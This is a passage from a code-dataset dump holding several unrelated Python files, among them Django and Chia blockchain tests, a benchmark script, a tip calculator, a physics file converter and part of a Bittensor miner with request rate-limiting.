self._order[team_num]\n","repo_name":"bf2799/ff_toolbox","sub_path":"src/model/general/draft.py","file_name":"draft.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31470785243","text":"import decimal\n\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext_lazy as _\nfrom finance_majordomo.stocks.models.transaction_models import Transaction\nfrom finance_majordomo.stocks.tests_transactions.setting import SettingsTransactions\n\n\nclass TransactionsModelsTest(SettingsTransactions):\n\n def test_models_params(self):\n self.assertEqual(self.transaction_id_1.ticker_id, 1)\n self.assertEqual(self.transaction_id_1.date, \"1999-12-31\")\n self.assertEqual(self.transaction_id_1.price, \"10\")\n self.assertEqual(self.transaction_id_1.fee, '0.00')\n self.assertEqual(Transaction.objects.count(), 7)\n self.assertEqual(\n self.transaction_id_5._meta.get_field('date').verbose_name,\n _(\"Transaction date\"))\n self.assertEqual(\n self.transaction_id_5._meta.get_field('quantity').verbose_name,\n _(\"Transaction quantity\"))\n self.assertEqual(\n self.transaction_id_5._meta.get_field('creation_date').verbose_name,\n _(\"Creation date\"))\n\n def test_price_validation_fail_1(self):\n price_invalid = \"not decimal\"\n\n with self.assertRaises(ValidationError):\n Transaction.objects.create(\n price=price_invalid,\n quantity=1,\n date='2020-03-02',\n ticker=self.stock_id_1,\n user=self.user_authenticated\n )\n\n def test_price_validation_fail_2(self):\n price_invalid = '100,10'\n\n with self.assertRaises(ValidationError):\n Transaction.objects.create(\n price=price_invalid,\n quantity=1,\n date='2020-03-02',\n ticker=self.stock_id_1,\n user=self.user_authenticated\n )\n\n # why InvalidOperation not ValidationError?\n def test_price_validation_fail_3(self):\n price_invalid = 123456789\n\n with self.assertRaises(decimal.InvalidOperation):\n Transaction.objects.create(\n price=price_invalid,\n quantity=1,\n date='2020-03-02',\n ticker=self.stock_id_1,\n user=self.user_authenticated\n )\n\n def test_date_validation_fail_1(self):\n date_invalid = '2020-02-30'\n\n with self.assertRaises(ValidationError):\n Transaction.objects.create(\n price='11',\n quantity=1,\n date=date_invalid,\n ticker=self.stock_id_1,\n user=self.user_authenticated\n )\n\n def test_date_validation_fail_2(self):\n date_invalid = '10-10-2020'\n\n with self.assertRaises(ValidationError):\n Transaction.objects.create(\n price='11',\n quantity=1,\n date=date_invalid,\n ticker=self.stock_id_1,\n user=self.user_authenticated\n )\n","repo_name":"Unshock/finance_majordomo","sub_path":"finance_majordomo/stocks/made tests/1test_models_trans.py","file_name":"1test_models_trans.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"27328556559","text":"import asyncio\nimport pytest\n\nfrom src.consensus.block_rewards import calculate_base_farmer_reward, calculate_pool_reward\nfrom src.consensus.blockchain import ReceiveBlockResult\nfrom src.protocols import full_node_protocol, wallet_protocol\nfrom src.protocols.protocol_message_types import ProtocolMessageTypes\nfrom src.simulator.full_node_simulator import FullNodeSimulator\nfrom src.simulator.simulator_protocol import FarmNewBlockProtocol\nfrom src.types.mempool_inclusion_status import MempoolInclusionStatus\nfrom src.types.peer_info import PeerInfo\nfrom src.util.errors import Err\nfrom src.util.ints import uint16, uint32\nfrom src.wallet.transaction_record import TransactionRecord\nfrom tests.core.full_node.test_full_node import add_dummy_connection\nfrom tests.setup_nodes import setup_simulators_and_wallets, self_hostname, bt\nfrom tests.time_out_assert import time_out_assert\n\n\n@pytest.fixture(scope=\"module\")\ndef event_loop():\n loop = asyncio.get_event_loop()\n yield loop\n\n\nclass TestTransactions:\n @pytest.fixture(scope=\"function\")\n async def wallet_node_30_freeze(self):\n async for _ in setup_simulators_and_wallets(1, 1, {\"INITIAL_FREEZE_PERIOD\": 30}):\n yield _\n\n @pytest.mark.asyncio\n async def test_transaction_freeze(self, wallet_node_30_freeze):\n num_blocks = 5\n full_nodes, wallets = wallet_node_30_freeze\n full_node_api: FullNodeSimulator = full_nodes[0]\n full_node_server = full_node_api.server\n wallet_node, server_2 = wallets[0]\n wallet = wallet_node.wallet_state_manager.main_wallet\n ph = await wallet.get_new_puzzlehash()\n\n incoming_queue, node_id = await add_dummy_connection(full_node_server, 12312)\n\n await server_2.start_client(PeerInfo(self_hostname, uint16(full_node_server._port)), None)\n for i in range(num_blocks):\n await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))\n\n funds = sum(\n [calculate_pool_reward(uint32(i)) + calculate_base_farmer_reward(uint32(i)) for i in range(1, num_blocks)]\n )\n # funds += calculate_base_farmer_reward(0)\n await asyncio.sleep(2)\n print(await wallet.get_confirmed_balance(), funds)\n await time_out_assert(10, wallet.get_confirmed_balance, funds)\n\n tx: TransactionRecord = await wallet.generate_signed_transaction(100, ph, 0)\n spend = wallet_protocol.SendTransaction(tx.spend_bundle)\n response = await full_node_api.send_transaction(spend)\n assert wallet_protocol.TransactionAck.from_bytes(response.data).status == MempoolInclusionStatus.FAILED\n\n new_spend = full_node_protocol.NewTransaction(tx.spend_bundle.name(), 1, 0)\n response = await full_node_api.new_transaction(new_spend)\n assert response is None\n\n peer = full_node_server.all_connections[node_id]\n new_spend = full_node_protocol.RespondTransaction(tx.spend_bundle)\n response = await full_node_api.respond_transaction(new_spend, peer=peer)\n assert response is None\n\n for i in range(26):\n await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))\n\n new_spend = full_node_protocol.NewTransaction(tx.spend_bundle.name(), 1, 0)\n response = await full_node_api.new_transaction(new_spend)\n assert response is not None\n assert ProtocolMessageTypes(response.type) == ProtocolMessageTypes.request_transaction\n\n tx: TransactionRecord = await wallet.generate_signed_transaction(100, ph, 0)\n spend = wallet_protocol.SendTransaction(tx.spend_bundle)\n response = await full_node_api.send_transaction(spend)\n assert response is not None\n assert wallet_protocol.TransactionAck.from_bytes(response.data).status == MempoolInclusionStatus.SUCCESS\n assert ProtocolMessageTypes(response.type) == ProtocolMessageTypes.transaction_ack\n\n @pytest.mark.asyncio\n async def test_invalid_block(self, wallet_node_30_freeze):\n num_blocks = 5\n full_nodes, wallets = wallet_node_30_freeze\n full_node_api: FullNodeSimulator = full_nodes[0]\n full_node_server = full_node_api.server\n wallet_node, server_2 = wallets[0]\n wallet = wallet_node.wallet_state_manager.main_wallet\n ph = await wallet.get_new_puzzlehash()\n\n await server_2.start_client(PeerInfo(self_hostname, uint16(full_node_server._port)), None)\n for i in range(num_blocks):\n await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))\n\n funds = sum(\n [calculate_pool_reward(uint32(i)) + calculate_base_farmer_reward(uint32(i)) for i in range(1, num_blocks)]\n )\n # funds += calculate_base_farmer_reward(0)\n await asyncio.sleep(2)\n print(await wallet.get_confirmed_balance(), funds)\n await time_out_assert(10, wallet.get_confirmed_balance, funds)\n\n tx: TransactionRecord = await wallet.generate_signed_transaction(100, ph, 0)\n\n current_blocks = await full_node_api.get_all_full_blocks()\n new_blocks = bt.get_consecutive_blocks(\n 1, block_list_input=current_blocks, transaction_data=tx.spend_bundle, guarantee_transaction_block=True\n )\n last_block = new_blocks[-1:][0]\n\n new_blocks_no_tx = bt.get_consecutive_blocks(\n 1, block_list_input=current_blocks, guarantee_transaction_block=True\n )\n last_block_no_tx = new_blocks_no_tx[-1:][0]\n\n result, error, fork = await full_node_api.full_node.blockchain.receive_block(last_block, None)\n assert error is not None\n assert error is Err.INITIAL_TRANSACTION_FREEZE\n assert result is ReceiveBlockResult.INVALID_BLOCK\n\n result, error, fork = await full_node_api.full_node.blockchain.receive_block(last_block_no_tx, None)\n assert error is None\n assert result is ReceiveBlockResult.NEW_PEAK\n\n after_freeze_blocks = bt.get_consecutive_blocks(24, block_list_input=new_blocks_no_tx)\n for block in after_freeze_blocks:\n await full_node_api.full_node.blockchain.receive_block(block, None)\n\n assert full_node_api.full_node.blockchain.get_peak_height() == 30\n\n new_blocks = bt.get_consecutive_blocks(\n 1, block_list_input=after_freeze_blocks, transaction_data=tx.spend_bundle, guarantee_transaction_block=True\n )\n last_block = new_blocks[-1:][0]\n result, error, fork = await full_node_api.full_node.blockchain.receive_block(last_block, None)\n assert error is None\n assert result is ReceiveBlockResult.NEW_PEAK\n","repo_name":"LeastAuthority/Chia-Network-chia-blockchain","sub_path":"tests/core/full_node/test_initial_freeze.py","file_name":"test_initial_freeze.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"16780563532","text":"\"\"\"\nbenchmark data validation librarys\n\nusage:\n\n python benchmark.py\n\nadd case:\n 1. create case_{CASE_NAME}.py\n 2. implement one or more funcs which can validate the `DATA` in this module\n 3. put validate funcs in a dict named `CASES` in case module\n\"\"\"\nimport json\nfrom profile import runctx\nfrom glob import glob\nfrom os.path import basename, dirname, splitext\nfrom timeit import Timer as BaseTimer\nfrom pprint import pprint as pp\n\nimport click\n\nDATA = {\n 'user': {'userid': 5},\n 'tags': [1, 2, 5, 9999, 1234567890],\n 'style': {\n 'width': 400,\n 'height': 400,\n 'border_width': 5,\n 'border_style': 'solid',\n 'border_color': 'red',\n 'color': 'black'\n },\n # \"optional\": \"string\"\n}\nTEXT = json.dumps(DATA)\n\n\ndef make_data():\n return json.loads(TEXT)\n\n\ndef glob_cases():\n files = glob(dirname(__file__) + '/case_*.py')\n cases = {}\n for filename in files:\n module = splitext(basename(filename))[0]\n name = module[len('case_'):]\n cases[name] = __import__(module).CASES\n return cases\n\n\nCASES = glob_cases()\n\n# support Timer.autorange which add in python 3.6\nif hasattr(BaseTimer, 'autorange'):\n Timer = BaseTimer\nelse:\n class Timer(BaseTimer):\n def autorange(self, callback=None):\n \"\"\"Return the number of loops and time taken so that total time >= 0.2.\n Calls the timeit method with *number* set to successive powers of\n ten (10, 100, 1000, ...) up to a maximum of one billion, until\n the time taken is at least 0.2 second, or the maximum is reached.\n Returns ``(number, time_taken)``.\n If *callback* is given and is not None, it will be called after\n each trial with two arguments: ``callback(number, time_taken)``.\n \"\"\"\n for i in range(1, 10):\n number = 10**i\n time_taken = self.timeit(number)\n if callback:\n callback(number, time_taken)\n if time_taken >= 0.2:\n break\n return (number, time_taken)\n\n\n@click.group()\ndef cli():\n pass\n\n\n@cli.command()\ndef show():\n \"\"\"show all cases\"\"\"\n pp({name: list(cases) for name, cases in CASES.items()})\n\n\ndef print_item(name, subname, value):\n print('{:>12}:{:<16} {}'.format(name, subname, value))\n\n\n@cli.command()\ndef test():\n \"\"\"test all cases\"\"\"\n for name, subcases in CASES.items():\n for subname, f in subcases.items():\n try:\n value = f(make_data())\n assert value['user'] == DATA['user']\n assert value['tags'] == DATA['tags']\n assert value['style'] == DATA['style']\n msg = 'OK'\n except AssertionError:\n msg = 'Failed\\n{line}\\n{value}{line}'.format(\n line='-' * 60, value=pp(value, output=False))\n except Exception as ex:\n msg = 'Failed: ' + str(ex)\n print_item(name, subname, msg)\n\n\n@cli.command()\n@click.option('--validr', is_flag=True, help='only benchmark validr')\ndef benchmark(validr):\n \"\"\"do benchmark\"\"\"\n if validr:\n cases = {k: CASES[k] for k in ['json', 'validr']}\n else:\n cases = CASES\n result = {}\n\n print('timeits'.center(60, '-'))\n for name, suncases in cases.items():\n for subname, f in suncases.items():\n data = make_data()\n n, t = Timer(lambda: f(data)).autorange()\n result[name, subname] = t / n\n print_item(name, subname, '{:>8} loops cost {:.3f}s'.format(n, t))\n\n print('scores'.center(60, '-'))\n base = result['json', 'loads-dumps']\n for (name, subname), v in result.items():\n print_item(name, subname, '{:>8}'.format(round(base / v * 1000)))\n\n\n@cli.command()\ndef profile():\n \"\"\"profile validr\"\"\"\n for name, f in CASES['validr'].items():\n print(name.center(60, '-'))\n params = {'f': f, 'data': make_data()}\n runctx('for i in range(10**5): f(data)', globals=params, locals=None)\n\n\nif __name__ == '__main__':\n cli()\n","repo_name":"guyskk/validr","sub_path":"benchmark/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":208,"dataset":"github-code","pt":"71"}
+{"seq_id":"7478699458","text":"from calculators import *\n\ndef valid_parentheses(x):\n\n eq_list = x # eg. ['(,'p','and','q',')']\n\n if ')(' in eq_list:\n return False\n \n only_p = []\n for i in eq_list:\n if i in['(',')']:\n only_p.append(i) # eg. ['(',')']\n stack = []\n lookup = {')':'('}\n\n for p in only_p:\n if p == ')(':\n return False\n if p in lookup.values():\n stack.append(p)\n elif stack and lookup[p] == stack[-1]:\n stack.pop()\n else:\n return False\n \n return stack == []\n\ndef parentheses_calculator(test):\n \n if '(' not in test:\n return regular_calculator(test)\n\n op_i = 0 # deepest opening index\n cl_i = 0 # corresponding closing index\n for i in range(len(test)):\n if test[i] == '(':\n op_i = i\n if test[i] == ')':\n cl_i = i\n break\n\n sub_expression_result = regular_calculator(test[op_i + 1:cl_i])\n test = test[:op_i] + sub_expression_result + test[cl_i + 1:]\n\n if cl_i - op_i == 2:\n test = test[:op_i] + '-' + test[cl_i + 1:]\n\n while '-' in test:\n test = test.replace('-', '')\n\n return parentheses_calculator(test)\n","repo_name":"eyadjs/truth-table-generator","sub_path":"parentheses.py","file_name":"parentheses.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"31828506824","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\nimport sys\r\nimport os\r\n\r\nnAtoms = 216\r\n\r\ndirectory = os.getcwd()\r\ninput_file_extension = '/gap2.out'\r\ninputfile = directory + input_file_extension\r\n\r\noutput_file_extension = '/gap2LAMMPS.out'\r\noutputfile = directory + output_file_extension\r\n\r\nnum_lines = sum(1 for line in open(inputfile))\r\n\r\no = open(outputfile, 'w+')\r\no.write('DFT Data File\\n\\n' + str(nAtoms) + ' atoms\\n\\n1 atom types\\n\\n')\r\n\r\nlines = open(inputfile).read().splitlines()\r\nfor n, line in enumerate(lines):\r\n\tif n == 37:\r\n\t\tnewline = line.split()\r\n\t\tprint(newline)\r\n\t\tbasisLength = float(newline[4])*.529177 #convert from bohrs to angstroms\r\n\tif n == 52:\r\n\t\tnewline = line.split()\r\n\t\txSize = float(newline[1])*.529177\r\n\t\tySize = float(newline[1])*.529177\r\n\t\tzSize = float(newline[5])*basisLength\r\n\r\n\t\to.write('0.0 ' + str(xSize) + ' xlo xhi\\n')\r\n\t\to.write('0.0 ' + str(ySize) + ' ylo yhi\\n')\r\n\t\to.write('0.0 ' + str(zSize) + ' zlo zhi\\n')\r\n\t\to.write('\\nMasses\\n\\n1 28.085\\n\\nAtoms\\n\\n')\r\n\tif n >= num_lines - 55 - nAtoms and n < num_lines - 55:\r\n\t\tnewline = line.split()\r\n\t\tatomID = n%(num_lines - 56 - nAtoms)\r\n\t\tatomType = 1\r\n\t\tblankLine = [str(atomID)]\r\n\t\tblankLine.append(str(atomType))\r\n\t\tblankLine.append(newline[1])\r\n\t\tblankLine.append(newline[2])\r\n\t\tblankLine.append(newline[3])\r\n\t\tseparator = '\\t'\r\n\t\tfinal_line = separator.join(blankLine)\r\n\t\to.write(final_line + \"\\n\")\r\n\r\n","repo_name":"dgunruh/Si-HJ-MD-DFT","sub_path":"FarmClusterScriptsAndFiles/nebCalculations/LAMMPS_neb/QEtoLAMMPS.py","file_name":"QEtoLAMMPS.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"69900400550","text":"# Functions for the tip calculator\n\ndef get_party_size(question, negative_input, error_message) -> int:\n '''Gets a users party size'''\n\n # flag to continue while loop\n party_size = True\n\n # Print a decorative title\n print(\"~~~~~~~~~~~~~~~~ PARTY ~~~~~~~~~~~~~~~~ \\n\")\n\n # While there isn't a party size given\n while party_size:\n # try and get an interger input from user\n try:\n # ask user for people in party\n party_size = int(input(question))\n\n # if number is less than 0, restart loop\n if party_size < 0:\n print(negative_input)\n continue\n\n # if the user enters 0, they want to exit\n if party_size == 0:\n exit()\n\n # print a spacer\n print()\n # return integer for party size\n return party_size\n\n # catch exception ValueError when user enters non-integer\n except ValueError:\n\n # print instructions\n print(error_message)\n\n\ndef get_bill_size(question, negative_input, error_message) -> float:\n '''Get the bill size from user, pre-tip'''\n\n # flag to continue while loop\n bill_input = True\n\n # Print a decorative title\n print(\"~~~~~~~~~~~~~~~~ BILL ~~~~~~~~~~~~~~~~ \\n\")\n\n while bill_input:\n try:\n\n # get users bill\n bill_pre_tip = float(input(question))\n\n # if bill is negative value, rerun loop\n if bill_pre_tip < 0:\n print(negative_input)\n continue\n\n # if bill is 0, then exit application\n if bill_pre_tip == 0:\n exit()\n\n # print a spacer\n print()\n # return the bill\n return bill_pre_tip\n # catch error of user inputing non type convertable value\n except ValueError:\n print(error_message)\n\n\ndef get_tip_percentage(question, negative_input, error_message) -> float:\n '''Gets the percentage to tip from the user'''\n\n # flag to continue while loop\n tip = True\n\n # Print a decorative title\n print(\"~~~~~~~~~~~~~~~~ TIP PERCENTAGE ~~~~~~~~~~~~~~~~ \\n\")\n\n # loop while no errors\n while tip:\n # try and get a float or int value from user\n try:\n tip_percentage = int(input(question))\n\n # if tip is less than 0, rerun loop\n if tip_percentage < 0:\n print(negative_input)\n continue\n\n # covert value given to decimal ie 20 = .20\n converted_tip = tip_percentage / 100\n\n return converted_tip\n\n except ValueError:\n print(error_message)\n\n\ndef get_tax_percentage(question, negative_input, error_message) -> float:\n '''Gets the percentage to tax from the user'''\n\n # flag to continue while loop\n tax = True\n\n # Print a decorative title\n print(\"~~~~~~~~~~~~~~~~ TAX PERCENTAGE ~~~~~~~~~~~~~~~~ \\n\")\n print(\"~~~~~~~~~~~~~~~~ DEFAULTS TO 10% ~~~~~~~~~~~~~~~~ \\n\")\n\n # loop while no errors\n while tax:\n # try and get a float or int value from user\n try:\n tax_percentage = int(input(question) or 10)\n\n # if tip is less than 0, rerun loop\n if tax_percentage < 0:\n print(negative_input)\n continue\n\n # covert value given to decimal ie 20 = .20\n converted_tax = tax_percentage / 100\n\n return converted_tax\n\n except ValueError:\n print(error_message)\n\n\ndef calculate_tip(party: int, tip_percentage: float, tax_percentage: float, bill: float) -> float:\n '''Calculates the bill per person of a party, after applying a tip percentage'''\n\n # calculate total bill with percentage of tip applied\n bill_w_percentage = bill * (1 + tip_percentage + tax_percentage)\n\n # calculate bill per person\n bill_per_person = bill_w_percentage / party\n\n # return bill per person\n return bill_per_person\n\n\ndef exit_application(text_to_exit, error_message) -> bool:\n '''Determines if user wants to exit application'''\n\n while True: # Ask user if they want to run application again\n run_again = input(text_to_exit)\n\n # # convert value to lower case for ease\n run_again = run_again.lower()\n\n # exit application if\n if run_again == 'no' or run_again == 'n':\n return False\n elif run_again == 'yes' or run_again == 'y':\n return True\n else:\n print(error_message)\n\n\ndef print_output(bill_pre_tip, tip_percentage, tax_percentage, party_size, bill_per_person):\n '''Prints a neat and clean output'''\n\n print()\n print(\"~~~~~~~~~~~~ TIP CALCULATIONS ~~~~~~~~~~~~\")\n\n print(\"Your bill total was:\" + f'${bill_pre_tip:.2f}'.rjust(22))\n\n print(f'Your tip percentage was:' +\n f'{int(tip_percentage * 100)}%'.rjust(18))\n\n print(f'Your tax percentage was:' +\n f'{int(tax_percentage * 100)}%'.rjust(18))\n\n print(f'Your party size was:' + f'{party_size}'.rjust(22))\n\n print('------------------------------------------')\n\n print(f'Bill per person:' + f'${bill_per_person:.2f}'.rjust(26))\n\n print()\n\n# Testing function for tip calc functions\n# assert calculate_tip(get_party_size(), get_tip_percentage(),\n# get_bill_size()) > 0, \"Return was negative\"\n# assert calculate_tip(1, .20, 10) == 12.00, \"Return didn't equal correct value\"\n","repo_name":"Blaine-Reid/python_tip_calculator","sub_path":"tip_calculator_no_ui/tip_calc_functions_no_ui.py","file_name":"tip_calc_functions_no_ui.py","file_ext":"py","file_size_in_byte":5468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"9112218278","text":"#Modifique o exercício anterior para aceitar somente valores maiores que 0 \n# para N. Caso o valor informado (para N) não seja maior que 0,\n# deverá ser lido um novo valor para N.\n\nn = int(input('Digite um valor: '))\nwhile (n <= 0):\n print('Digite um numero maior que zero')\n n = int(input())\n\nfor i in range(0, n):\n i = i + 1\n print(i)","repo_name":"eduardoanj/cursopyton","sub_path":"Nova pasta (2)/python/ex 44.py","file_name":"ex 44.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40311338618","text":"from django.http import JsonResponse\nfrom .models import Profile\nfrom orders.models import Order\nfrom django.shortcuts import render, redirect\nfrom profiles.models import Profile\nfrom django.shortcuts import get_object_or_404\n\n\ndef profile(request, profile_name):\n try:\n user_profile = Profile.objects.get(nickname=profile_name)\n context = {\n 'profile': user_profile,\n 'name': user_profile.nickname\n }\n return render(request, 'profiles/profile.html', context)\n except Profile.DoesNotExist:\n return render(request, 'profiles/profile_not_found.html')\n\n\ndef home(request):\n userinfo = request.session.get(\"user\") if request.session.get(\"user\") else None\n if userinfo:\n id = userinfo.get('id')\n orders = Order.objects.filter(dev_id=0).exclude(user_id=id)\n name = userinfo.get(\"name\")\n nickname = userinfo.get(\"nickname\")\n picture = userinfo.get(\"picture\")\n return render(request, 'home.html', {'orders': orders, 'name': name, 'nickname': nickname, 'picture': picture})\n else:\n return redirect('/')\n\n\ndef myorders(request):\n userinfo = request.session.get(\"user\") if request.session.get(\"user\") else None\n if userinfo:\n user_id = userinfo.get(\"id\")\n name = userinfo.get(\"name\")\n nickname = userinfo.get(\"nickname\")\n picture = userinfo.get(\"picture\")\n orders = Order.objects.filter(user_id=user_id)\n return render(request, 'myorders.html',\n {'orders': orders, 'name': name, 'nickname': nickname, 'picture': picture})\n else:\n return redirect('/')\n\n\ndef mytasks(request):\n userinfo = request.session.get(\"user\") if request.session.get(\"user\") else None\n if userinfo:\n user_id = userinfo.get(\"id\")\n name = userinfo.get(\"name\")\n nickname = userinfo.get(\"nickname\")\n picture = userinfo.get(\"picture\")\n orders = Order.objects.filter(dev_id=user_id)\n return render(request, 'mytasks.html',\n {'orders': orders, 'name': name, 'nickname': nickname, 'picture': picture})\n else:\n return redirect('/')\n","repo_name":"7selik7/StuHub","sub_path":"profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"42976563537","text":"import re\nimport os\nimport time\nimport copy\nimport wandb\nimport json\nimport pathlib\nimport asyncio\nimport template\nimport argparse\nimport requests\nimport threading\nimport traceback\nimport numpy as np\nimport pandas as pd\nimport bittensor as bt\n\nfrom openai import OpenAI\nfrom functools import partial\nfrom collections import deque\nfrom openai import AsyncOpenAI\nfrom starlette.types import Send\nfrom abc import ABC, abstractmethod\nfrom transformers import GPT2Tokenizer\nfrom config import get_config, check_config\nfrom typing import List, Dict, Tuple, Union, Callable, Awaitable\n\nfrom template.utils import get_version\nfrom template.protocol import StreamPrompting, IsAlive, ImageResponse, Embeddings\n\n\nOpenAI.api_key = os.environ.get('OPENAI_API_KEY')\nif not OpenAI.api_key:\n raise ValueError(\"Please set the OPENAI_API_KEY environment variable.\")\n\nnetrc_path = pathlib.Path.home() / '.netrc'\nwandb_api_key = os.getenv('WANDB_API_KEY')\n\nprint(\"WANDB_API_KEY is set:\", bool(wandb_api_key))\nprint(\"~/.netrc exists:\", netrc_path.exists())\n\nif not wandb_api_key and not netrc_path.exists():\n raise ValueError(\"Please log in to wandb using `wandb login` or set the WANDB_API_KEY environment variable.\")\n\nclient = AsyncOpenAI(timeout=60.0)\nvalid_hotkeys = []\n\n\nclass StreamMiner(ABC):\n def __init__(self, config=None, axon=None, wallet=None, subtensor=None):\n bt.logging.info(\"starting stream miner\")\n base_config = copy.deepcopy(config or get_config())\n self.config = self.config()\n self.config.merge(base_config)\n check_config(StreamMiner, self.config)\n bt.logging.info(self.config) # TODO: duplicate print?\n self.prompt_cache: Dict[str, Tuple[str, int]] = {}\n self.request_timestamps = {}\n\n # Activating Bittensor's logging with the set configurations.\n bt.logging(config=self.config, logging_dir=self.config.full_path)\n bt.logging.info(\"Setting up bittensor objects.\")\n\n # Wallet holds cryptographic information, ensuring secure transactions and communication.\n self.wallet = wallet or bt.wallet(config=self.config)\n bt.logging.info(f\"Wallet {self.wallet}\")\n\n # subtensor manages the blockchain connection, facilitating interaction with the Bittensor blockchain.\n self.subtensor = subtensor or bt.subtensor(config=self.config)\n bt.logging.info(f\"Subtensor: {self.subtensor}\")\n bt.logging.info(\n f\"Running miner for subnet: {self.config.netuid} on network: {self.subtensor.chain_endpoint} with config:\"\n )\n\n # metagraph provides the network's current state, holding state about other participants in a subnet.\n self.metagraph = self.subtensor.metagraph(self.config.netuid)\n bt.logging.info(f\"Metagraph: {self.metagraph}\")\n\n if self.wallet.hotkey.ss58_address not in self.metagraph.hotkeys:\n bt.logging.error(\n f\"\\nYour validator: {self.wallet} if not registered to chain connection: {self.subtensor} \\nRun btcli register and try again. \"\n )\n exit()\n else:\n # Each miner gets a unique identity (UID) in the network for differentiation.\n self.my_subnet_uid = self.metagraph.hotkeys.index(\n self.wallet.hotkey.ss58_address\n )\n bt.logging.info(f\"Running miner on uid: {self.my_subnet_uid}\")\n\n # The axon handles request processing, allowing validators to send this process requests.\n self.axon = axon or bt.axon(wallet=self.wallet, port=self.config.axon.port)\n # Attach determiners which functions are called when servicing a request.\n bt.logging.info(f\"Attaching forward function to axon.\")\n print(f\"Attaching forward function to axon. {self._prompt}\")\n self.axon.attach(\n forward_fn=self._prompt,\n blacklist_fn=self.blacklist_prompt,\n ).attach(\n forward_fn=self._is_alive,\n blacklist_fn=self.blacklist_is_alive,\n ).attach(\n forward_fn=self._images,\n blacklist_fn=self.blacklist_images,\n ).attach(\n forward_fn=self._embeddings,\n blacklist_fn=self.blacklist_embeddings,\n )\n bt.logging.info(f\"Axon created: {self.axon}\")\n\n # Instantiate runners\n self.should_exit: bool = False\n self.is_running: bool = False\n self.thread: threading.Thread = None\n self.lock = asyncio.Lock()\n self.request_timestamps: Dict = {}\n thread = threading.Thread(target=get_valid_hotkeys, args=(self.config,))\n thread.start()\n\n @abstractmethod\n def config(self) -> \"bt.Config\":\n ...\n\n def _prompt(self, synapse: StreamPrompting) -> StreamPrompting:\n return self.prompt(synapse)\n\n def base_blacklist(self, synapse, blacklist_amt = 20000) -> Tuple[bool, str]:\n try:\n hotkey = synapse.dendrite.hotkey\n synapse_type = type(synapse).__name__\n\n if hotkey in template.WHITELISTED_KEYS:\n return False, f\"accepting {synapse_type} request from {hotkey}\"\n\n if hotkey not in valid_hotkeys:\n return True, f\"Blacklisted a {synapse_type} request from a non-valid hotkey: {hotkey}\"\n\n uid = None\n axon = None\n for _uid, _axon in enumerate(self.metagraph.axons):\n if _axon.hotkey == hotkey:\n uid = _uid\n axon = _axon\n break\n\n if uid is None and template.ALLOW_NON_REGISTERED == False:\n return True, f\"Blacklisted a non registered hotkey's {synapse_type} request from {hotkey}\"\n\n # check the stake\n tao = self.metagraph.neurons[uid].stake.tao\n # metagraph.neurons[uid].S\n if tao < blacklist_amt:\n return True, f\"Blacklisted a low stake {synapse_type} request: {tao} < {blacklist_amt} from {hotkey}\"\n\n time_window = template.MIN_REQUEST_PERIOD * 60\n current_time = time.time()\n\n if hotkey not in self.request_timestamps:\n self.request_timestamps[hotkey] = deque()\n\n # Remove timestamps outside the current time window\n while self.request_timestamps[hotkey] and current_time - self.request_timestamps[hotkey][0] > time_window:\n self.request_timestamps[hotkey].popleft()\n\n # Check if the number of requests exceeds the limit\n if len(self.request_timestamps[hotkey]) >= template.MAX_REQUESTS:\n return (\n True,\n f\"Request frequency for {hotkey} exceeded: {len(self.request_timestamps[hotkey])} requests in {template.MIN_REQUEST_PERIOD} minutes. Limit is {template.MAX_REQUESTS} requests.\"\n )\n\n self.request_timestamps[hotkey].append(current_time)\n\n return False, f\"accepting {synapse_type} request from {hotkey}\"\n\n except Exception as e:\n bt.logging.error(f\"errror in blacklist {traceback.format_exc()}\")\n \n \n def blacklist_prompt( self, synapse: StreamPrompting ) -> Tuple[bool, str]:\n blacklist = self.base_blacklist(synapse, template.PROMPT_BLACKLIST_STAKE)\n bt.logging.info(blacklist[1])\n return blacklist \n\n def blacklist_is_alive( self, synapse: IsAlive ) -> Tuple[bool, str]:\n blacklist = self.base_blacklist(synapse, template.ISALIVE_BLACKLIST_STAKE)\n bt.logging.debug(blacklist[1])\n return blacklist\n \n def blacklist_images( self, synapse: ImageResponse ) -> Tuple[bool, str]:\n blacklist = self.base_blacklist(synapse, template.IMAGE_BLACKLIST_STAKE)\n bt.logging.info(blacklist[1])\n return blacklist\n\n def blacklist_embeddings( self, synapse: Embeddings ) -> Tuple[bool, str]:\n blacklist = self.base_blacklist(synapse, template.EMBEDDING_BLACKLIST_STAKE)\n bt.logging.info(blacklist[1])\n return blacklist\n\n @classmethod\n @abstractmethod\n def add_args(cls, parser: argparse.ArgumentParser):\n ...\n\n def _prompt(self, synapse: StreamPrompting) -> StreamPrompting:\n return self.prompt(synapse)\n\n async def _images(self, synapse: ImageResponse) -> ImageResponse:\n return await self.images(synapse)\n\n async def _embeddings(self, synapse: Embeddings) -> Embeddings:\n return await self.embeddings(synapse)\n\n def _is_alive(self, synapse: IsAlive) -> IsAlive:\n bt.logging.info(\"answered to be active\")\n synapse.completion = \"True\"\n return synapse\n\n @abstractmethod\n def prompt(self, synapse: StreamPrompting) -> StreamPrompting:\n 